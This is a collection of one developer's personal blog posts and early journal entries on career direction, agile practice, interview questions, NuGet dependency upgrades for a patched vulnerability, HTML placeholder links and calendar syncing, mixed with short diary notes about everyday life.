* **Become a "frontend" engineer** - Traditionally I've been a "full stack" or "backend" engineer which fits my engineering strengths of dealing with complexity in code (for example [tech debt as discussed here](/2020/07/09/approaches-to-refactoring-and-technical-debt/)). Way back there wasn't much complexity beyond a bit of jQuery in most frontend things, in fact I didn't come across the frontend/backend specialization for many years. For a long time the designers-who-can-html dominated frontend land. But these days with ES6, Typescript, npm, angular, react, etc. etc. there is now endless complexity on the frontend for someone like me to get my teeth into. With that in mind (and with a view to improving my ability to ship side-projects) I've been updating my languishing frontend skills. (There's not much frontend in my recent work for UK Gov as that's pretty much templated out with the [gov.uk design system](https://design-system.service.gov.uk/), and accessibility concerns means that fancy responsive SPAs don't tend to pass muster). Having put the idea out there with recruiters etc. but not getting much interest I think it's probably a jump too far in one go, but either way I'll spend some spare time skilling up.
* **Lead developer** - I don't really know why I didn't think of this sooner, it's actually a good fit for where I've been and where my life is at now. This is my current identity to try on, wish me luck! The rest of this post is about this.
Here's why I like the team lead idea right now:
I think I can provide more value as a contract team-lead for dotnet delivery teams. I can still crank code, and still enjoy coding, but helping a whole team succeed is a worthy thing.
The higher rates would make up for it being a less commonly available role (there's always at least two individual contributors for every team lead, and leads are less commonly contractors). And I could always fill in with coder work in any gaps.
Thinking back to my history and current position, I've enjoyed the lead roles I've done, I love enabling those around me, and I've learned some tricks for being able to stay close to the tech without getting in the way (see "staying sharp" above). I can still crank code, but it seems a shame to learn everything I have beyond the code and then not put it into practice.
### Experience leading
One of my earliest contracts was a project where I was brought in as a solo dev with a view to delivering an asp.net project. The first task was to collect the requirements from a sales person (not an end user or user researcher sadly but that's how it was). So armed with my new love of [balsamiq mockups](https://balsamiq.com/) I set about turning the explained needs into a set of wireframes, using them as a tool for discussion and iterating them as I better understood the problem at hand. I then started work building. After some time the CTO sauntered over and casually asked how likely we were to meet the publicised launch date now that we understood what needed to be built. "Zero" I said, as this was quite a sizeable thing on a not particularly long timeline. A lovely chap to work with he didn't pass further comment and disappeared again.
Not much later I found myself with a team to work on the project consisting of a mix of permanent development staff who'd been reassigned to the project. Because I was there first and I was in touch with the people relaying user's needs I was naturally the hub for the team. Additionally I was one of the few who'd practiced agile methods in previous roles. The result was I felt it was far more important that I enabled the rest of my team to be as productive as possible by eliminating things that were blocking them as my top priority. So there I was, being a team lead for a dev team building a new product, making sure everyone was able to get on, talking to stakeholders and running our sprint demos to ensure everyone inside and outside the project team understood how it was going and could play their part. Pleasingly we shipped a usable system in time for the deadline.
### Experience mentoring
I've always helped everyone I can to be the best they can be, freely sharing knowledge with anyone who's interested. Not just developers either, in my view the more non-technical roles know about the thing we're all working on the more effective they can be.
I officially mentored DfE Digital's first civil-servant developer which was a real pleasure. You can hear a bit more about that on [my podcast episode "A retrospective of mentoring, with <NAME>"](https://pod.timwise.co.uk/10)
## Summary
Well that was a lot more than I expected when I sat down to write, guess there's a lot floating around my head after 21 years thinking, doing and learning.
Wish me luck, and I hope this helps you in some way.
If you want my help with a team just get in touch, I'm always happy to chat.
<file_sep>---
title: "pointless acronyms"
date: 2005-05-13
slashdot_url: https://slashdot.org/journal/106752/pointless-acronyms
---
<p>to celebrate being unblocked, here's a list of interesting acronyms of "timothy abell"</p>
<p>Hot Meaty Bill<br>I'm the tall boy<br>Ah be tit molly<br>Ah ibm to telly<br>Toby a h millet<br>Thai be my toll<br>Hallo im betty<br>My halo be tilt<br>Bye to ill math<br>Let my hat boil<br>Bet i'm thy lola<br>Thy lola bit me!<br>Totally be him<br>Me hit tall boy<br>Lay the to limb<br>Am bill the toy</p>
<p>So there.</p>
<file_sep>---
title: "more pics"
date: 2004-08-19
slashdot_url: https://slashdot.org/journal/80837/more-pics
---
<p><a href="http://www.timwise.co.uk/images/IMG_4042.JPG">here</a></p>
<file_sep>---
title: "This weekend"
date: 2004-03-14
slashdot_url: https://slashdot.org/journal/65206/this-weekend
---
<p>This weekend went extremely well.<br>Friday night me and Mr T had an excellent curry at the <a href="http://www.readingrestaurants.com/Haweli/">Hawelli</a>, shame no one else came but it was good anyway, hospitality was excellent as usual, and Juggy was down there, which was nice.<br>Saturday morning = sleep. Got up in time to go outside and get hailed on. (ow, ow ow ow, ouch!). Then I cycled into Reading and bought some new shoes (-: (pwetty dress - <a href="http://www.weebl.jolt.co.uk/shoes.htm">[context]</a>).<br>Karaoke at the local - yay, much drunkenness.</p>
<p>Today, pub lunch with folks. A quick jog in the new shoes, then more sleep.</p>
<p>Congratulations to Joel & Ritu:<br>See <a href="http://www.jmansford.f2s.com/Jai/">this</a> and <a href="http://www.photobox.co.uk/public/detail.html?c_album=612927">this</a>.<br>Utterly adoreable.<br>(I work with Joel, for those who don't know)</p>
<file_sep>---
title: "geek here"
date: 2005-11-09
slashdot_url: https://slashdot.org/journal/121708/geek-here
---
<p>My second note on code project:<br><a href="http://www.codeproject.com/script/profile/whos_who.asp?id=1037965">http://www.codeproject.com/script/profile/whos_who.asp?id=1037965</a></p>
<p>Code project is possibly the slowest site ever.</p>
<file_sep>---
title: "Swimming"
date: 2004-03-20
slashdot_url: https://slashdot.org/journal/65813/swimming
---
<p>Not a bad week on the exercise front. Was planning to swim all five days. Managed four, but failed on wed due to brain failure leading to lack of trunks at swimming pool (and no, I was not going to swim without them, or in my boxers as some have suggested). Got back in and went for a two and a half mile run, which was good, then Miss S came over and was person number two to grace my new sofa (not in the bed configuration I might add), number one was Mr T (a good friend of Miss C). Persons three and four were the folks, (hello folks!) Mr & Mrs A during random visit for cup of tea and curry.</p>
<p>Weather: Pissy.<br>Motivation: Food and sleep.</p>
<file_sep>---
title: "<NAME>"
date: 2003-12-05
slashdot_url: https://slashdot.org/journal/54225/eddie-izzard
---
<p>Yay for eddie izzard at the Birmingham NIA.<br>Yay for not enough sleep.</p>
<file_sep>---
title: Taking an idea from business concept to software implementation
layout: post
---
This post is my explanation of a concept I got from someone far more intelligent than me, and I've written it here in my own words as much to see if I can understand, explain and refine it as to share it with you lovely people. When one person teaches two people learn, as they say.
## Context
Sometimes you are taking instructions from someone who deeply understands technology and how to design and iterate delivery of software systems. This blog post is **not** about that situation.
This post is for when the people with the business knowledge don't know how to run digital projects themselves, and that's why you're here.
It's also **not** a post about an individual technologist doing the whole thing, listening to the business and then building what they need; in that case you need far less formal process.
This approach is for software engineering **teams**, which means the business knowledge has to be transferred effectively into many heads. System design and implementation is in this case a collaborative engineering effort.
## Method
1. Business folks ensure they have an idea of what their needs are, the relevant context and are ready to explain and document it for engineering teams.
1. Run a workshop where "the business" shares with the delivery team the business requirements they have gathered in their preparation for the work plus the context for the needs (i.e. the "why").
1. The goal is to create a common understanding of what the business needs without getting into technical design or product increments / stories / tasks.
1. The outputs of this exercise should be living documents that can be referred to and refined as project delivery continues and understanding evolves.
1. This is a collaborative exercise, with the engineering delivery team actively probing and challenging and the shared artifacts being refined with the new understanding.
1. Don't forget "unhappy" paths as well as the more obvious "happy" paths, plus non-functionals like capacity, latency, cost, design, UX etc.
1. Explanatory diagrams, journey maps and data journey maps are preferable to bullet lists and prose as they encourage the right level of detail and help avoid solutionizing.
1. Check out [Miro](https://miro.com/) & [Lucidchart](https://www.lucidchart.com/) to assist with sharing this understanding, as well as whiteboards, Post-its, index cards etc.
1. Run a technical design session with the technical team to plan out the design of the system and a route to delivery at a high level. The business do not need to be present but may need to be consulted for clarifications of the above business needs.
1. Present the design back to the business to flush out any issues and further refine understanding of the business needs. Iterate as necessary.
1. Produce user stories that represent independently deliverable capabilities. (Only as much as you need right now for planning and delivery, let's not turn this into waterfall!) ... With these user stories you can then:
1. Estimate the delivery effort required (complexity, t-shirt sizes, story points etc)
1. Prioritise them based on estimated cost versus value delivered.
1. Prioritise things by the risk involved (e.g. "this is completely unknown so let's spike this first to reduce delivery risk")
1. Figure out what depends on what and order delivery based on that.
1. Decide what should be delivered versus what should be dropped. (A [Product Owner](https://timwise.co.uk/2019/07/08/why-every-team-needs-a-delivery-manager/#aside-product-who) decision)
1. Only once this shared understanding of the business needs and context plus system design is in place do we proceed to delivery of the user stories in whatever way the engineering team sees fit. Presumably some kind of agile/scrum/xp kind of thing.
<file_sep>---
title: "Swimming"
date: 2003-12-02
slashdot_url: https://slashdot.org/journal/53812/swimming
---
<p>Yay! I swam this morning. Well done me.<br>I managed about three complete lengths, in 45 mins.<br>My god I'm soo unfit. Well, at least the only way is up.</p>
<file_sep>---
title: "Swimming"
date: 2003-12-16
slashdot_url: https://slashdot.org/journal/55282/swimming
---
<p>Been swimming again this morning. Got up in time today so had 45mins in the pool, and managed a staggering 25 lengths (625 metres).</p>
<p>I'm quite pleased with that. And as usual celebrated with a cup of tea in the local cafe. This morning I was joined by my gorgeous assistant, R.</p>
<file_sep>---
title: "copying all (hidden) files in linux with cp"
date: 2005-09-29
slashdot_url: https://slashdot.org/journal/118511/copying-all-hidden-files-in-linux-with-cp
---
<p>One of my old pet hates in Windoze is the default explorer setting to hide system files, which means you don't get everything when copying stuff.</p>
<p>In linux, a hidden file or directory is anything that starts with a dot.<br>So, I want to take a copy of my ~/ (home, like windoze profile), hidden files and all.</p>
<blockquote>
<div><p> <tt>cd<nobr> </nobr>/home/tim<br>cp -r<nobr> </nobr>./*<nobr> </nobr>/mnt/otherhdd/stuff/timshome/</tt></p></div> </blockquote>
<p>Look with ls -l, no hidden files. hrmm.</p>
<p>Only thing I could find was this:<br><a href="https://www.redhat.com/archives/fedora-list/2004-October/msg01760.html">https://www.redhat.com/archives/fedora-list/2004-October/msg01760.html</a> </p>
<blockquote>
<div><p> <tt>cp -r<nobr> </nobr>.??*<nobr> </nobr>/mnt/otherhdd/stuff/timshome/</tt></p></div> </blockquote>
<p>Seems a bit clunky to me.<br>Anyone know a better way? Like cp -rh or summat.</p>
<file_sep>---
title: "and paypal aren't looking too hot"
date: 2005-06-12
slashdot_url: https://slashdot.org/journal/109166/and-paypal-arent-looking-too-hot
---
<p><a href="http://www.paypalsucks.com/">http://www.paypalsucks.com/</a><br>erk, think I'll extract my money pronto<br>I shall be looking into these alternatives: Amazon,Yahoo,Onsale,2good2toss</p>
<p>Really it seems where ever you go there are scare stories. I've heard of cahoot freezing an account without good reason and being really shit about it when contacted. The whole thing makes me want to keep my cash under the mattress.</p>
<file_sep>---
title: Technical phone screen interview questions
layout: post
---
I was tasked with giving an initial assessment of technical competence / fit in a 30 minute phone call. Ideally I'd like
This tech screen is based on [Steve Yegge’s "The Five Essential Phone-Screen Questions"](https://sites.google.com/site/steveyegge2/five-essential-phone-screen-questions)
My lightweight version goes something like this:
## 1) Coding
Ask them to describe the code for a console app that prints the ten-times table in a grid. This is intended to get them to describe a nested for loop, or maybe some fancier construct. It doesn’t matter if they nail it, you can tell if they understand how to code from how they talk about it. Bonus for whether they can understand a verbal description (possibly imperfectly described), and throw together a solution in their head.
This isn’t a substitute for an in-person pairing session, but it gives a quick indication whether they have a clue how to code.
It's supposed to be something like this, which is remarkably hard to explain on the phone from my side (no points deducted for my inability to be clear!):
```
1 2 3 4 5 6 7 8 9 10
2 4 6 8 10 12 14 16 18 20
3 6 9 12 15 18 21 24 27 30
4 8 12 16 20 24 28 32 36 40
5 10 15 20 25 30 35 40 45 50
6 12 18 24 30 36 42 48 54 60
7 14 21 28 35 42 49 56 63 70
8 16 24 32 40 48 56 64 72 80
9 18 27 36 45 54 63 72 81 90
10 20 30 40 50 60 70 80 90 100
```
## 2) OO design (and other structures)
Ask them to describe how they can arrange their code, giving a hint that I’m after object oriented things. I’m looking for a confident off-hand description of inheritance, interfaces etc.
If they don’t fluff that, ask if they know non-OO approaches (composition, modules, mixins etc) that are used in languages other than C# to see how broad and deep their knowledge is.
## 3) Scripting & Regex
Context: It’s not uncommon for microsoft devs to never look outside the microsoft sandbox. This can result in someone spending week(s) writing a program to solve a problem that can be done with one linux command. Times are changing and Microsoft loves linux, but these narrow thinkers are best avoided. This question is almost pointless for ruby devs who live in unix land.
Question: you have a server with thousands of plain-text log files scattered across hundreds of folders and you need to find all the lines with a particular user-id in them to solve a production problem.
Good answer: `grep` (this means they know of unix tools, maybe probe how wide that is)
Bad answer: I’d start a new project in visual studio and use FileInfo classes…
Follow up question: what if you needed to find an identifier that matched a pattern but wasn’t always the same? (i.e. do they know about regex)
Great answer: I’d use `egrep` with a regex (or similar tools); goes on to explain a bunch of great tools I hadn’t heard of before
If they have other smart ways (e.g. they know about log aggregation tools like Kibana), guide them back to a limited toolset (“it’s a legacy system, you haven’t got any of that...”)
## 4) Data Structures
Do they know the difference between dictionaries and lists, particularly when it comes to speed of lookup.
Related: Do they know about [algorithmic complexity](https://www.bigocheatsheet.com/) - this sorts the self-taughts from the computer-science degree crowd, but if you don’t know this stuff it’ll bite you sooner or later.
See if they are aware of the available structures.
See how clearly they can explain why you’d choose one over the other for a particular piece of code.
It doesn’t matter if they can recall the specifics, it just matters that they’d think to go and look up the specifics when they needed to decide.
## 5) Bits and bytes
Do they know why you don’t store money in floating point variables?
Great: use decimal instead because floating point cannot accurately represent decimal fractions and will give you rounding errors that upset the accountants and customers
Okay: always use decimals, but don’t really know why
Bad: I’d use a float for money
---
So that’s it for Steve’s list.
I also like to ask them how they feel about the following:
## 6) Testing
Are they militant about TDD? What do they think about BDD? Are they more pragmatic?
How do they think about why you write tests.
This isn’t likely to be make or break, but might indicate better or worse fit with a team and is good to know.
## 7) Agile
What kind of agile structures have they worked in. What did they think about it.
I’m looking for enthusiasm for the way the best agile teams operate, it doesn’t matter too much if it’s SCRUM or something else. Do they seem like they’d be adaptable? Would they push for better?
Have they worked on GDS style teams? (For gov work)
## Assessment
During the debrief I usually discuss at least some of the following areas, focussing on what seems to be the make or break points:
* skill / knowledge level: architect & team lead > senior engineer > narrow senior engineer > competent > hand-holding needed > complete liability
* communication style, ability to discuss piece of theoretical code
* attitude towards tech (e.g. do they demand testing or are they more “pragmatic”)
* attitude towards organisational structures and approaches (i.e. scrum or GDS team structures)
* how they would likely fit in with the intended team
Some example outcomes of the technical assessment might be:
* Strong - knew everything, broad knowledge, could clearly do the job
* Qualified positive - can probably build something within some boundaries, but you’d want a strong tech lead in charge to keep things on track
* Weak - lacking knowledge of important areas of tech, failed to explain a good solution to a simple nested loop problem
## Bias and scoring
To minimize risk of bias sneaking in and giving me a "favourite" based on how similar they are to me rather than how well they did I like to do a written report scoring each area above.
<file_sep>---
title: Upgrading indirect NuGet dependencies
layout: post
---
## Update - transitive pinning
It seems microsoft have produced a solution to this problem, along with the long awaited solution-level package management. Read all about it here: <https://devblogs.microsoft.com/nuget/introducing-central-package-management/#transitive-pinning>
---
## About
The state of the art for dependency management in dotnet land. Having used ruby bundler and npm this makes me cry.
I really hope I'm massively wrong about the following information. Please do tell me if I'm wrong and NuGet dependency management is not actually as bad as this!
## Paket, a NuGet alternative
If you have the option then look into replacing nuget with [paket](https://fsprojects.github.io/Paket/) for your projects as I gather this has the below problems solved.
## Indirect dependencies
Say you depend on [Microsoft.AspNetCore.Http v2.2.2](https://www.nuget.org/packages/Microsoft.AspNetCore.Http/2.2.2) (which is the latest available at time of writing), which in turn depends on [Microsoft.AspNetCore.Http.Abstractions >= v2.2.0](https://www.nuget.org/packages/Microsoft.AspNetCore.Http.Abstractions/2.2.0) (also currently the latest) which in turn depends on [System.Text.Encodings.Web >= 4.5.0](https://www.nuget.org/packages/System.Text.Encodings.Web/4.5.0)
And then you discover, say, just for a fun example, that [System.Text.Encodings.Web v4.5.0 has the Remote Code Execution (RCE) Vulnerability CVE-2021-26701](https://github.com/dotnet/announcements/issues/178).
Thankfully Microsoft have released a patch release with a fix for the CVE: [System.Text.Encodings.Web v4.5.1](https://www.nuget.org/packages/System.Text.Encodings.Web/4.5.1)
So obviously you'll just upgrade your packages, run CI, make a cup of tea and ship to prod, right? Wrong.
But it says `>= 4.5.0`, so shurley it'd just upgrade it?...
Apparently not. It seems that for whatever reason nuget actually prefers the *lowest* compatible patch release. Go figure. So it won't upgrade.
### Checking the source of truth
Because I'm starting to doubt my sanity at this point, let's dive in to the source code for the middle package to make sure we're not just being ignorant about how it actually works.
`Microsoft.AspNetCore.Http.Abstractions` has abstracted out the version info for its dependencies to another file, you can see the defined version of the [...Encodings.Web dependency as at v2.2.0 here](https://github.com/aspnet/HttpAbstractions/blob/release/2.2/build/dependencies.props#L24)
```
<SystemTextEncodingsWebPackageVersion>4.5.0</SystemTextEncodingsWebPackageVersion>
```
which is then [referenced in the `.csproj` here](https://github.com/aspnet/HttpAbstractions/blob/release/2.2/src/Microsoft.AspNetCore.Http.Abstractions/Microsoft.AspNetCore.Http.Abstractions.csproj#L23)
```
<PackageReference Include="System.Text.Encodings.Web" Version="$(SystemTextEncodingsWebPackageVersion)" />
```
On the face of it you'd think that this meant it was pinned to an exact version, but microsoft in their infinite desire to pander to the lowest common denominator (i.e. idiots and n00bs) decided that `1.0` should actually mean `1.*`.
| Notation | Applied rule | Description |
|----------|--------------|----------------------------|
| 1.0 | x ≥ 1.0 | Minimum version, inclusive |
| ... | | |
Source: [NuGet version range definitions](https://docs.microsoft.com/en-us/nuget/concepts/package-versioning#version-ranges)
It doesn't even define whether it will upgrade major, minor, or just patch releases. Horror-show.
## lock files
Lock files don't actually help much here, but are a good idea, so if you want to use them here's what I've learned about `packages.lock.json` files in Microsoft-land.
NuGet is veeeeeeeeeeery late to the lockfile game. A lockfile is just a second file that lists the dependency tree that was actually calculated for a given set of top level dependencies. Useful for repeatable builds and lets you see what's being resolved, but doesn't actually help fix the problem here as the point of lockfiles isn't to manually futz with them, it's just to do repeatable builds. And futzing with them would confuse everyone, and is made a little harder with the inclusion of checksums.
It is possible to [manually enable lockfiles](https://devblogs.microsoft.com/nuget/enable-repeatable-package-restores-using-a-lock-file/) by adding the following to a csproj file:
```xml
<PropertyGroup>
<RestorePackagesWithLockFile>true</RestorePackagesWithLockFile>
</PropertyGroup>
```
I very much enjoyed [this multi-comment rant at the NuGet team](https://github.com/NuGet/Home/issues/5602#issuecomment-450269920) for basically being behind the times and always making poor decisions.
There is a slightly harder problem that microsoft have so far failed to sort out of [managing packages across a whole solution](https://github.com/NuGet/Home/wiki/Centrally-managing-NuGet-package-versions) (i.e. multiple projects). Though I can't help thinking that it's mostly hard because of the mess they've allowed to build up so far. (For example encouraging people to create multiple solutions with a mix of project files included, and the horror that is the one-giant-tree TFS system.)
## Forcing the upgrade
So it seems the only way to force the upgrade of the vulnerable "transitive" dependency (i.e. one not directly specified in your `.csproj` file) is to add it as an explicit dependency directly to the `.csproj` `PackageReference` entries. This is lame, and likely to cause confusion later. Make sure your commit message is clear as to why you've added this seemingly nonsense dependency.
```xml
<ItemGroup>
    <PackageReference Include="System.Text.Encodings.Web" Version="4.5.1"/>
</ItemGroup>
```
## Getting notified of dependency updates
If you run any production code you can run an analysis tool like [Snyk.io](https://snyk.io/) or [dependabot](https://github.com/dependabot) to check for such CVEs popping up in your dependency graph.
You'll probably want to install a local version of whatever you use to avoid the CI loop for every change you make, [snyk has a visual studio extension](https://marketplace.visualstudio.com/items?itemName=snyk-security.snyk-vulnerability-scanner).
<file_sep>---
title: "mountain bike stolen"
date: 2006-11-24
slashdot_url: https://slashdot.org/journal/136097/mountain-bike-stolen
---
<p>Some low life stole my mountain bike on sunday night.<br>Bolt cropped both locks.<br>Was in the bike shed behind the closed gate behind the flats.<br>Bastards.</p>
<file_sep>---
layout: post
title: Unfinished hyperlinks - add a todo
date: '2013-05-25T10:03:00.001Z'
author: <NAME>
tags:
modified_time: '2014-11-07T15:22:19.522Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-4587715440628289713
blogger_orig_url: https://timwise.blogspot.com/2013/05/unfinished-hyperlinks-add-todo.html
---
Just a quick post;
# Stop doing this
href="#"
# Start doing this
href="#todo"
# Why?
I'd like to promote a change to the habit of using '#' as the placeholder for the url of a new hyperlink when you don't yet know where it'll link to: instead set the href to "#todo". This follows the //todo pattern recognised for unfinished code, and means you can now search your codebase for any links you forgot to finish off.
<a href="#">new link</a>
becomes
<a href="#todo" onclick="alert('Not Implemented');return false;">new link</a>
Demo: <a href="#">before</a> becomes <a href="#todo">after</a>
It will also give clues to any sharp-eyed testers / users that they should
report a bug for you as the url will change to #todo when the unfinished link
is clicked. It can often be seen in the status bar too. This has the handy
side-effect of avoiding the annoying jump to the top of the page that is the
default behaviour when you click on a # link that's a placeholder.
For bonus points another little trick I like is to add a click handler with an
alert to make it really obvious to any early users / testers that this is not
done yet, and I've found this saves a lot of questions when you genuinely
haven't finished, and also guarantees a quick bug report when you should have
(not that I ever forget any of course :-D)
<a href="#">new link</a>
becomes
<a href="#todo" onclick="alert('Not Implemented');return false;">new link</a>
Demo: <a href="#">before</a> becomes <a href="#todo" onclick="alert('Not Implemented');return false;">after</a>
You can automate giving all these links an alert with the following (cheers to
"unknown" in the blogger comments)
    $("a[href='#todo']").click(function () { alert('Not implemented yet.') });
Simple and effective.
If you agree, please help spread the word. Perhaps by retweeting [my tweet](https://twitter.com/tim_abell/status/338235507203002368)
* * *
P.S. This goes hand in hand with a technique of picking points during development at which there should be no todo's left in your codebase with the exception of those with references to outstanding user story / bug numbers. I suggest before marking a user story as done, and at the end of each sprint as good points to review all todos in your codebase.
Further reading:
* [The case against TODO - wordaligned.org](http://wordaligned.org/articles/todo)
* [Using a JetBrains IDE to manage todos](http://blog.jetbrains.com/webide/2012/10/managing-todo/)
<file_sep>---
title: "mourn"
date: 2004-10-26
slashdot_url: https://slashdot.org/journal/88222/mourn
---
<p>It is truly a sad day for music today.<br>The king of radio is dead.</p>
<p>This leaves a gap in my life.</p>
<file_sep>---
layout: post
title: The trouble with agile is it's a bit too good
date: '2012-01-17T03:21:00.013Z'
author: <NAME>
categories: [niggle, agile, project management]
modified_time: '2012-01-17T09:56:42.349Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2568814673689579544
blogger_orig_url: https://timwise.blogspot.com/2012/01/trouble-with-agile-is-its-bit-too-good.html
---
So you've gone **Agile!** Woo! Well done! You've escaped the last millennium's
software practices at last! And boy do you feel in *control* at last! The
iterations are flying past, the story points are getting done at a rate you
could only have dreamt of. No longer do you wonder what your development team
are up to for months at a time, with that nagging feeling that you are pouring
money in and you're not getting best "value".
Seems like some kind of productivity utopia doesn't it?
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/6606813059/"><img
src="https://live.staticflickr.com/7172/6606813059_304696d41b.jpg" alt="Photo of a waterfall in Wales"></a>
</div>
But there's still something not quite right isn't there? Are the technical team
*still* moaning (pah, that's just technical people isn't it? ... or is it? they
often have a point, just usually a difficult one). There's this thing they are
always going on about, maybe it changes day to day, maybe it's the same. Maybe
it doesn't seem well enough defined to *deserve* a story. Maybe it just some
long term gripe that's never quite as important as all those other items in the
backlog that have a priority of "O.M.G. if we don't do this by the 14th of this
month we're all DEAD!!$$£##£!!!", so it keeps getting barely scheduled and
certainly never [done, done,
done](http://codebetter.com/jeremymiller/2006/04/14/code-complete-is-a-lie-done-done-done-is-the-truth/)!
(Okay, calm down excitable agile people, saying it once is fine.) But hey
*that's the process* so it must be right, if it doesn't make it, it *can't*
have been that important. Can it?
Well, it's time for some unscientific theorizing.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/6597177893/"><img
src="https://live.staticflickr.com/7151/6597177893_1b72a38092.jpg" alt="Atomospheric photo of clouds"></a>
</div>
I've been doing a bit of job hopping recently (nothing on the scale of
contracting, but I've seen a few different things, and a few different
approaches to project management). And I've noticed something in the two
examples of agile
([SCRUM](http://en.wikipedia.org/wiki/Scrum_%28development%29) specifically)
I've been close to that bothers me.
> “When it comes to the detail of the work, the manager is relying on the
> expertise of their staff.”
As a bit of background, remember that software development is a highly skilled
job. Software development is one of those funny worlds of work where the
employee inevitably knows more than the manager. The manager will likely have
more broad context (I really hope so, for that matter), but when it comes to
the detail of the work, and the *right* thing to do, the manager is relying on
the expertise of their staff to make detailed decisions. This is as it should
be given that the developers spend all their working hours, often more,
immersed in the detail, keeping up with the current technology, and becoming
ever more skilled at the job. Even if a manager is initially just as
knowledgeable in the field as their staff, just by virtue of spending more time
managing than doing (nothing wrong with that of course), they will inevitably
become less knowledgeable than their developers over time (whether they admit
it or not, and don't we all know someone who still thinks they know
everything!)
Okay, I'll get to the point already (this had better be good).
If you have moved from one of the less well controlled project management
methods (including the "general panic" approach), then you may or may not have
realised that **a fundamental shift in power has occurred**. The ability to
direct the way your development team spends their time has moved more into the
hands of the manager, and away from the hands of the individual developers. On
the whole I consider this a good thing, as individual developers deciding to do
things by fiat doesn't always help a company with its immediate deadlines, and
there is a much improved ability under the new regime to pick a goal and get
there more or less on time (unless you are just paying lip service to SCRUM),
with fewer nasty surprises along the way (such as, the good old "where did that
month go?" experience). In the past, management could give the developers
direction one month to the next, but day to day was a bit of a mystery, and
without SCRUM in place too it was much overhead to cope with. Now, *every* day
is accounted for. Life is good, the company gets more of what it asks its
developers for.
Every developer I have worked with has wanted to do a good job for the company they are working for. And they have all been generally competent at both coding, and interacting with management in getting the job done. So if they are good people, and we are so much more "productive" now, then why were they *wasting* all this time before? Well, to an extent you can explain the improvements by the elimination of some of the tail chasing exercises that happen under less disciplined approaches to project management. But that's not quite enough. There's something else, and **it's a question of perceived priorities** and the effect they have on what gets done.
When you have your head under the bonnet, you'll notice all the leaks and all the frayed cables. And as anyone who's taken their car to a garage will know, the mechanic can always find something to suck their teeth about and charge you an extra £150\. But when you are just driving the car it all seems just peachy till service time. But why do you give in and pay up for that thing you've never heard of? Surely if the car was fine when you were driving, then it *must* be okay? Well, I don't know about you, but for me it's the fear of ending up as a pile of <span style="color: rgb(153, 0, 0);">tomato ketchup</span> on the inside of my windscreen when I finally find out why that thing I can't even name was actually important. So how is this a good analogy? No-one ever died from bad software, right? Well the point is, the mechanic is skilled (*like the developer*), and I am not (*like the manager*). Like the manager, I have to decide which things to spend my money on and which things to pretend I know about and leave till the MOT fails.
Software developers, being skilled tradespeople, always have an eye on the long
term, and will always be balancing the current panic from the sales department
against what is good for the company in the long run. In the past, when you
used to lose months at a time, it was often partly because the developers were
taking some time to look after the company's long term interests. In hindsight
it is easy to justify the long term work that was done with some glib comment,
as it's no longer really up for discussion; you can't get the time back after
all. But imagine if all these long term things had to be justified *before*
they were done, even if the manager doesn't know what on earth the developers
are talking about. Well you know what, a lot of it wouldn't get done, and the
developers who really care about your long term future (i.e. those you haven't
ground down yet into despondency by ignoring them for years on end), would
get narked. If it's hard to "put a business case for" then a lot of good
developers I know will just not bother, after all they don't have to save
management from themselves, that wasn't in the job specification, and people
don't like being saved from themselves anyway. Unfortunately, this is exactly
the change that moving to SCRUM introduces. Developers can no longer "just do"
something that takes more than a day, no matter how much it needs doing in the
long run, as it will be blindingly obvious at the daily stand-ups that they are
not sticking to tasks, and are going to make an iteration miss its target.
After all each iteration is likely already chock full of "[must
haves](http://en.wikipedia.org/wiki/MoSCoW_Method)", and even if a developer
puts the effort in to get a long term piece of work into an iteration, it will
always end up lower priority than user stories for customer visible deadlines,
and therefore likely still not get done (unless you are getting your velocity
right, which of course you should be).
<span style="color: rgb(0, 0, 0);">Interlude.</span> You may now hum to
yourself for a bit before I attempt to tell you how to fix it.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/6495790775/"><img
src="https://live.staticflickr.com/7005/6495790775_7190968d21.jpg" alt="Photo of a bench carved from a tree in the woods"></a>
</div>
So what to do? In a way maybe it's no different to the car analogy. Make sure
you (management) get enough long term stuff into the iterations, and give them
just as much priority as anything else. Make sure they get *done*! Just as if
they were a short term deadline. Then in the long run, the wheels won't fall
off your software, at least not while you're driving. <span style="color:
rgb(102, 102, 102);font-size:85%;">(This blog post contains no warranty, road
conditions may vary, any number of factors may cause the wheels to fall off your
software. Especially if driven over rough specifications.)</span> Make sure
your team of developers know that you are committed to this so that they do
actually come forward with the things they *know* need to be done sooner or
later. (If you don't know about it you certainly can't get it fixed.) Perhaps
you could create a separate long term plan with the help of the team that
provides for long term needs, giving it real deadlines that are as immovable as
whatever conference you are showing at next. If you have to justify it to
others you can say "because the long term is just as important to our business
as the now"! Have the courage of your convictions. Back the long term as well
as the short term. Always have an eye on the build up of outstanding long term
items (c.f. [technical debt](https://en.wikipedia.org/wiki/Technical_debt)). If
the long term plan doesn't look like it fits with what you *have* to deliver
day to day, then maybe you need to step back and look at your software
architecture as a whole, or the resourcing in your team. I would suggest a
practical plan: set a percentage of time that will be spent on the long term
items, say 10%, which is ring fenced for use by the technical experts (the
developers), for making sure the long term needs of your software are looked
after.
Sooner or later, if things run their new agile course, the chickens will come
home to roost, and you'll start to wonder why it's taking longer and longer to
get those features out, or more time will be lost to bugs, or things will just
start to outright fail. So I urge you to think about the long term and not
forget that the manager is not the expert in the detail - that's what your
developers are there for. So listen to your techies and the advice they have on
the balance of priorities, and take that into account when creating and
prioritising your backlog. You will have a happier team and happier software as
a result.
So in summary:
* Moving to agile is excellent, but prevents your technical experts from
quietly fixing things for you to the same extent.
* Don't forget the long term in the excitement of getting features done,
done, done!
<file_sep>---
title: Link your outlook calendar with your google calendar
layout: post
---
If you have a Google/GSuite calendar and a Microsoft Teams/Office365/Outlook calendar you can get the Microsoft Outlook calendar to pull in all the events from your Google calendar which is handy when you want to know if you have any gaps or conflicts.
Amazingly, if you move google entries around in the outlook calendar the changes are pushed back to the google calendar.
## Link the Google calendar into the Outlook calendar
* Go to your Teams calendar
* Click the "add calendar" button
[](/images/blog/google-teams-calendar/1-add-cal.png)
Here you can see the "Add calendar" button as well as the end result of showing the two calendars together (google in red, outlook in blue)
* Click "Add personal calendars" and follow the instructions. The below shows the result. (The calendar defaults to blue but we can change that).
[](/images/blog/google-teams-calendar/2-connect-to-google.png)
## Give the Google calendar a different colour
You can then give the calendar a different colour in "Edit my calendars"
